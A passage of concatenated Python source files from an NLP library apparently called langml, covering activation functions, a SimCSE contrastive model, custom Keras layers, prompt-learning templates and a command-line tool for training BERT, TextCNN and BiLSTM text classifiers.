r""" Gaussian Error Linear Units (GELUs)
https://arxiv.org/abs/1606.08415
$GELU(x) = 0.5 x (1 + \tanh[\sqrt{2/\pi} (x + 0.044715 x^3)])$
"""
return 0.5 * x * (1.0 + K.tanh(math.sqrt(2.0 / math.pi) * (x + 0.044715 * x**3)))
def relu2(x: Tensors) -> Tensors:
return K.pow(K.relu(x), 2)
custom_objects = {'gelu': gelu, 'relu2': relu2}
keras.utils.get_custom_objects().update(custom_objects)
```
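A quick, self-contained sanity check of the two activations (values are approximate; this assumes whichever Keras backend `langml` exposes is available):

```python
import numpy as np
from langml import K
from langml.activations import gelu, relu2

x = K.constant(np.array([-1.0, 0.0, 1.0], dtype='float32'))
print(K.eval(gelu(x)))    # approx [-0.159, 0.0, 0.841]
print(K.eval(relu2(x)))   # [0.0, 0.0, 1.0]
```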
#### File: contrastive/simcse/model.py
```python
from langml import keras, K, L
from langml.plm import load_albert, load_bert
from langml.baselines import BaselineModel, Parameters
from langml.tensor_typing import Models, Tensors
def simcse_loss(y_true, y_pred):
y_true = K.cast(K.arange(0, K.shape(y_pred)[0]), dtype=K.floatx())
return K.mean(K.sparse_categorical_crossentropy(y_true, y_pred, from_logits=True))
class SimCSE(BaselineModel):
def __init__(self,
config_path: str,
ckpt_path: str,
params: Parameters,
backbone: str = 'roberta'):
self.config_path = config_path
self.ckpt_path = ckpt_path
self.params = params
assert backbone in ['bert', 'roberta', 'albert']
self.backbone = backbone
if backbone == 'albert':
self.load_plm = load_albert
else:
self.load_plm = load_bert
self.get_cls_lambda = L.Lambda(lambda x: x[:, 0], name='cls')
self.get_first_last_avg_lambda = L.Average(name='first-last-avg')
self.get_last_avg_lambda = L.Lambda(lambda x: K.mean(x, axis=1), name='last-avg')
def get_pooling_output(self, model: Models, output_index: int, pooling_strategy: str = 'cls') -> Tensors:
""" get pooling output
Args:
model: keras.Model, BERT model
output_index: int, specify output index of feedforward layer.
pooling_strategy: str, specify pooling strategy from ['cls', 'first-last-avg', 'last-avg'], default `cls`
"""
assert pooling_strategy in ['cls', 'first-last-avg', 'last-avg']
if pooling_strategy == 'cls':
return self.get_cls_lambda(model.output)
outputs, idx = [], 0
if self.backbone == 'albert':
while True:
try:
output = model.get_layer('Transformer-FeedForward-Norm').get_output_at(idx)
outputs.append(output)
idx += 1
except Exception:
break
N = len(outputs)
if output_index == 0:
outputs = outputs[:N // 2]
elif output_index == 1:
outputs = outputs[N // 2:]
else:
while True:
try:
output = model.get_layer(
'Transformer-%d-FeedForward-Norm' % idx
).get_output_at(output_index)
outputs.append(output)
idx += 1
except Exception:
break
if pooling_strategy == 'first-last-avg':
outputs = [
L.Lambda(lambda x: K.mean(x, axis=1))(outputs[0]),
L.Lambda(lambda x: K.mean(x, axis=1))(outputs[-1])
]
output = self.get_first_last_avg_lambda(outputs)
elif pooling_strategy == 'last-avg':
output = self.get_last_avg_lambda(outputs[-1])
else:
raise NotImplementedError
return output
def build_model(self, pooling_strategy: str = 'cls', lazy_restore: bool = False) -> Models:
assert pooling_strategy in ['cls', 'first-last-avg', 'last-avg']
if lazy_restore:
model, bert, restore_bert_weights = self.load_plm(self.config_path, self.ckpt_path, lazy_restore=True)
else:
model, bert = self.load_plm(self.config_path, self.ckpt_path, dropout_rate=self.params.dropout_rate)
augmented_text_in = L.Input(shape=(None, ), name='Input-Augmented-Token')
augmented_segment_in = L.Input(shape=(None, ), name='Input-Augmented-Segment')
augmented_text, augmented_segment = augmented_text_in, augmented_segment_in
augmented_model = bert(inputs=[augmented_text, augmented_segment])
output = self.get_pooling_output(model, 0, pooling_strategy)
augmented_output = self.get_pooling_output(augmented_model, 1, pooling_strategy)
l2_normalize = L.Lambda(lambda x: K.l2_normalize(x, axis=1), name='l2_norm')
similarity = L.Lambda(
lambda x: K.dot(x[0], K.transpose(x[1]) / self.params.temperature),
name='similarity'
)([l2_normalize(output), l2_normalize(augmented_output)])
encoder = keras.Model(inputs=model.input, outputs=[output])
train_model = keras.Model((*model.input, *augmented_model.input), similarity)
train_model.summary()
train_model.compile(keras.optimizers.Adam(self.params.learning_rate),
loss=simcse_loss)
# For distributed training, restoring bert weight after model compiling.
if lazy_restore:
restore_bert_weights(model)
return train_model, encoder
```
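`simcse_loss` above ignores the incoming `y_true` and substitutes `arange(batch_size)`, i.e. the i-th augmented view is the only positive for the i-th sentence. A small numpy sketch of that target construction and the resulting cross-entropy (the 3x3 similarity matrix is made up):

```python
import numpy as np

sim = np.array([[5.0, 1.0, 0.2],
                [0.5, 4.0, 0.1],
                [0.3, 0.2, 6.0]])          # similarity / temperature, rows = sentences
targets = np.arange(sim.shape[0])          # what simcse_loss substitutes for y_true
log_probs = sim - np.log(np.exp(sim).sum(axis=1, keepdims=True))
loss = -log_probs[np.arange(len(targets)), targets].mean()
print(targets, round(loss, 4))
```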
#### File: langml/plm/layers.py
```python
from typing import Optional, List, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
from langml.tensor_typing import Tensors, Initializer, Constraint, Regularizer
class TokenEmbedding(L.Embedding):
@staticmethod
def get_custom_objects() -> dict:
return {'TokenEmbedding': TokenEmbedding}
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> List[Union[Tensors, None]]:
return [super(TokenEmbedding, self).compute_mask(inputs, mask), None]
def call(self, inputs: Tensors) -> List[Tensors]:
return [super(TokenEmbedding, self).call(inputs), self.embeddings + 0]
def compute_output_shape(self, input_shape: Tensors) -> List[Tensors]:
return [super(TokenEmbedding, self).compute_output_shape(input_shape), K.int_shape(self.embeddings)]
class EmbeddingMatching(L.Layer):
def __init__(self,
initializer: Initializer = 'zeros',
regularizer: Optional[Regularizer] = None,
constraint: Optional[Constraint] = None,
use_bias: bool = True,
**kwargs):
super(EmbeddingMatching, self).__init__(**kwargs)
self.supports_masking = True
self.initializer = keras.initializers.get(initializer)
self.regularizer = keras.regularizers.get(regularizer)
self.constraint = keras.constraints.get(constraint)
self.use_bias = use_bias
def get_config(self) -> dict:
config = {
'initializer': keras.initializers.serialize(self.initializer),
'regularizer': keras.regularizers.serialize(self.regularizer),
'constraint': keras.constraints.serialize(self.constraint),
}
base_config = super(EmbeddingMatching, self).get_config()
return dict(base_config, **config)
def build(self, input_shape: Tensors):
if self.use_bias:
self.bias = self.add_weight(
shape=(int(input_shape[1][0]), ),
initializer=self.initializer,
regularizer=self.regularizer,
constraint=self.constraint,
name='bias',
)
super(EmbeddingMatching, self).build(input_shape)
def compute_mask(self, inputs: Tensors, mask: Optional[Tensors] = None) -> Tensors:
if isinstance(mask, list):
return mask[0]
return mask
def call(self, inputs: Tensors, mask: Optional[Tensors] = None, **kwargs) -> Tensors:
inputs, embeddings = inputs
output = K.dot(inputs, K.transpose(embeddings))
if self.use_bias:
output = K.bias_add(output, self.bias)
return K.softmax(output)
@staticmethod
def get_custom_objects() -> dict:
return {'EmbeddingMatching': EmbeddingMatching}
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
return input_shape[0][:2] + (input_shape[1][0], )
class Masked(L.Layer):
"""Generate output mask based on the given mask.
https://arxiv.org/pdf/1810.04805.pdf
"""
def __init__(self,
return_masked: bool = False,
**kwargs):
super(Masked, self).__init__(**kwargs)
self.supports_masking = True
self.return_masked = return_masked
@staticmethod
def get_custom_objects() -> dict:
return {'Masked': Masked}
def get_config(self) -> dict:
config = {
'return_masked': self.return_masked,
}
base_config = super(Masked, self).get_config()
return dict(base_config, **config)
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> Union[List[Union[Tensors, None]], Tensors]:
token_mask = K.not_equal(inputs[1], 0)
masked = K.all(K.stack([token_mask, mask[0]], axis=0), axis=0)
if self.return_masked:
return [masked, None]
return masked
def call(self, inputs: Tensors, mask: Optional[Tensors] = None, **kwargs) -> Tensors:
output = inputs[0] + 0
if self.return_masked:
return [output, K.cast(self.compute_mask(inputs, mask)[0], K.floatx())]
return output
def compute_output_shape(self, input_shape: Tensors) -> Union[List[Tensors], Tensors]:
if self.return_masked:
return [input_shape[0], (2, ) + input_shape[1]]
return input_shape[0]
```
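A minimal weight-tying sketch using the two layers above: `TokenEmbedding` returns both the looked-up embeddings and the embedding matrix, and `EmbeddingMatching` projects hidden states back onto that matrix. The vocabulary size, dimension, and input ids below are made up.

```python
import numpy as np
from langml import keras, L
from langml.plm.layers import TokenEmbedding, EmbeddingMatching

vocab_size, embed_dim = 100, 16
tokens_in = L.Input(shape=(None,), name='Input-Token')
embedded, embedding_matrix = TokenEmbedding(vocab_size, embed_dim, name='Embedding-Token')(tokens_in)
# Tie the output projection to the input embedding matrix
probs = EmbeddingMatching(name='Embedding-Match')([embedded, embedding_matrix])
model = keras.Model(tokens_in, probs)
print(model.predict(np.array([[1, 2, 3, 0]])).shape)   # (1, 4, 100)
```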
#### File: langml/prompt/base.py
```python
from abc import ABCMeta, abstractmethod
from typing import Dict, List, Tuple
from langml.tensor_typing import Models
from langml.tokenizer import Tokenizer
from langml.plm import load_albert, load_bert
from langml.log import info
class Template:
def __init__(self, template: List[str], label_tokens_map: Dict[str, List[str]], tokenizer: Tokenizer) -> None:
self.tokenizer = tokenizer
self.unk_id = self.tokenizer.token_to_id(self.tokenizer.special_tokens.UNK)
self.template_ids = self.encode_template(template)
self.label2tokens, self.id2label = self.encode_label_tokens_map(label_tokens_map)
info(f'template ids: {self.template_ids}')
def __len__(self) -> int:
return len(self.template_ids)
    def encode_template(self, template: List[str]) -> List[int]:
return [self.tokenizer.token_to_id(token) for token in template]
    def encode_label_tokens_map(self, label_tokens_map: Dict[str, List[str]]) -> Tuple[Dict[str, List[int]], Dict[int, str]]:
label2ids, id2label = {}, {}
for label, tokens in label_tokens_map.items():
token_ids = []
for token in tokens:
token_id = self.tokenizer.token_to_id(token)
assert token_id != self.unk_id, f'unknown token {token}! please specify a token from vocabulary'
token_ids.append(token_id)
id2label[token_id] = label
label2ids[label] = token_ids
return label2ids, id2label
def decode_label(self, idx: int, default='<UNK>') -> str:
return self.id2label.get(idx, default)
class BasePromptModel(metaclass=ABCMeta):
def __init__(self,
plm_backbone: str,
plm_config_path: str,
plm_ckpt_path: str,
template: Template,
learning_rate: float = 1e-5,
freeze_plm: bool = True) -> None:
""" Initialize Prompt Model
Args:
- plm_backbone: str, backbone of pretrained language model
- plm_config_path: str, configure path of pretrained language model
- plm_ckpt_path: str, checkpoint path of pretrained language model
        - template: Template, prompt template object that wraps the template tokens and the label-to-token verbalizer (built with a langml.Tokenizer)
- learning_rate: float, learning rate
- freeze_plm: bool, whether to freeze pretrained language model weights
"""
self.model = None
self.freeze_plm = freeze_plm
if plm_backbone == 'albert':
_, self.plm, self.lazy_restore_callback = load_albert(
config_path=plm_config_path,
checkpoint_path=plm_ckpt_path,
pretraining=True,
with_mlm=True,
with_nsp=False,
lazy_restore=True)
else:
_, self.plm, self.lazy_restore_callback = load_bert(
config_path=plm_config_path,
checkpoint_path=plm_ckpt_path,
pretraining=True,
with_mlm=True,
with_nsp=False,
lazy_restore=True)
self.template = template
self.learning_rate = learning_rate
@abstractmethod
def build_model(self) -> Models:
raise NotImplementedError
class BasePromptTask(metaclass=ABCMeta):
def __init__(self, prompt_model: BasePromptModel, tokenizer: Tokenizer) -> None:
self.prompt_model = prompt_model
self.template = prompt_model.template
self.tokenizer = tokenizer
self.mask_id = self.tokenizer.token_to_id(self.tokenizer.special_tokens.MASK)
self.model = self.prompt_model.build_model()
@abstractmethod
def fit(self):
raise NotImplementedError
@abstractmethod
def predict(self):
raise NotImplementedError
class BaseDataGenerator(metaclass=ABCMeta):
@abstractmethod
def make_iter(self, random: bool = False):
raise NotImplementedError
@abstractmethod
def __len__(self):
raise NotImplementedError
def __call__(self, random: bool = False):
while True:
for inputs, labels in self.make_iter(random=random):
yield inputs, labels
```
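A hedged construction example for `Template`: the template tokens, verbalizer words, and vocabulary path below are placeholders, and `WPTokenizer` is the wordpiece tokenizer used elsewhere in langml. It only runs against a real vocabulary that contains the verbalizer words.

```python
from langml.tokenizer import WPTokenizer
from langml.prompt.base import Template

tokenizer = WPTokenizer('/path/to/vocab.txt', lowercase=True)   # placeholder path
tokenizer.enable_truncation(max_length=128)

template = Template(
    template=['it', 'was', '[MASK]', '.'],                         # prompt tokens
    label_tokens_map={'positive': ['good'], 'negative': ['bad']},  # verbalizer
    tokenizer=tokenizer,
)
print(len(template), template.decode_label(tokenizer.token_to_id('good')))
```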
#### File: prompt/clf/utils.py
```python
from typing import List, Optional, Tuple
import numpy as np
from boltons.iterutils import chunked_iter
from sklearn.metrics import classification_report, f1_score
from langml import keras, TF_KERAS
from langml.prompt.base import Template
def merge_template_tokens(
template_ids: List[int],
token_ids: List[int],
max_length: Optional[int] = None
) -> Tuple[List[int], List[int]]:
""" Merge template and token ids
Args:
- template_ids: List[int], template ids
- token_ids: List[int], token ids
- max_length: int, max length
Return:
- token_ids: List[int], merged token ids
- template_mask: List[int], template mask
"""
token_ids = [token_ids[0]] + template_ids + token_ids[1:-1]
if max_length:
token_ids = token_ids[:max_length - 1] + [token_ids[-1]]
template_mask = [0] + [1] * len(template_ids) + [0] * (len(token_ids) - len(template_ids) - 1)
return token_ids, template_mask
class MetricsCallback(keras.callbacks.Callback):
def __init__(self,
data: List[str],
labels: List[str],
mask_id: int,
template: Template,
patience: int = 10,
batch_size: int = 32,
model_path: Optional[str] = None,
f1_average: str = 'macro'):
self.data = data
self.labels = labels
self.mask_id = mask_id
self.template = template
self.patience = patience
self.batch_size = batch_size
self.model_path = model_path
self.f1_average = f1_average
def on_train_begin(self, logs=None):
self.step = 0
self.wait = 0
self.stopped_epoch = 0
self.warmup_epochs = 2
self.best_f1 = float('-inf')
def on_epoch_end(self, epoch, logs=None):
pred_labels = []
for chunk in chunked_iter(self.data, self.batch_size):
batch_templates, batch_tokens, batch_segments, batch_mask_ids = [], [], [], []
for obj in chunk:
batch_templates.append(obj['template_mask'])
batch_tokens.append(obj['token_ids'])
batch_segments.append(obj['segment_ids'])
batch_mask_ids.append(obj['mask_ids'])
batch_templates = keras.preprocessing.sequence.pad_sequences(
batch_templates, truncating='post', padding='post')
batch_tokens = keras.preprocessing.sequence.pad_sequences(
batch_tokens, truncating='post', padding='post')
batch_segments = keras.preprocessing.sequence.pad_sequences(
batch_segments, truncating='post', padding='post')
batch_mask_ids = keras.preprocessing.sequence.pad_sequences(
batch_mask_ids, truncating='post', padding='post')
if TF_KERAS:
logits = self.model([batch_templates, batch_tokens, batch_segments, batch_mask_ids])
else:
logits = self.model.predict([batch_templates, batch_tokens, batch_segments, batch_mask_ids])
output = np.argmax(logits[0], axis=1)
output = output * (batch_tokens == self.mask_id).astype('int')
output = output[output > 0].tolist()
pred_labels += [self.template.decode_label(idx) for idx in output]
assert len(self.labels) == len(pred_labels)
print(classification_report(self.labels, pred_labels))
f1 = f1_score(self.labels, pred_labels, average=self.f1_average)
if f1 > self.best_f1:
self.best_f1 = f1
self.wait = 0
if self.model_path is not None:
print(f'new best model, save weights to {self.model_path}')
self.model.save_weights(self.model_path)
else:
self.wait += 1
if self.wait >= self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
``` |
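For concreteness, a tiny trace of `merge_template_tokens` with made-up ids (101/102 standing in for [CLS]/[SEP]); the module path is assumed from the file layout above:

```python
from langml.prompt.clf.utils import merge_template_tokens

token_ids, template_mask = merge_template_tokens([5, 6], [101, 30, 31, 102])
print(token_ids)       # [101, 5, 6, 30, 31]
print(template_mask)   # [0, 1, 1, 0, 0]
```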
{
"source": "4AI/TDEER",
"score": 2
} |
#### File: baselines/clf/cli.py
```python
import os
import json
from typing import Optional
from shutil import copyfile
import click
from langml import TF_VERSION, TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
from langml.log import info
from langml.baselines import Parameters
from langml.baselines.clf import Infer, compute_detail_metrics
from langml.baselines.clf.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
from langml.tokenizer import WPTokenizer, SPTokenizer
MONITOR = 'val_accuracy' if not TF_KERAS or TF_VERSION > 1 else 'val_acc'
@click.group()
def clf():
"""classification command line tools"""
pass
@clf.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bert(backbone: str, epoch: int, batch_size: int, learning_rate: float, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], early_stop: int, use_micro: bool,
config_path: str, ckpt_path: str, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bert import Bert
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('finished training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=True)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--filter_size', type=int, default=100, help='filter size of convolution')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def textcnn(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
filter_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.textcnn import TextCNN
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'filter_size': filter_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = TextCNN(params).build_model()
else:
model = TextCNN(params).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = TextCNN(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('finished training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size of lstm')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--with_attention', is_flag=True, default=False, help='apply bilstm attention')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bilstm(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
hidden_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, with_attention: bool, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
    from langml.baselines.clf.bilstm import BiLSTM
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BiLSTM(params).build_model(with_attention=with_attention)
else:
model = BiLSTM(params).build_model(with_attention=with_attention)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
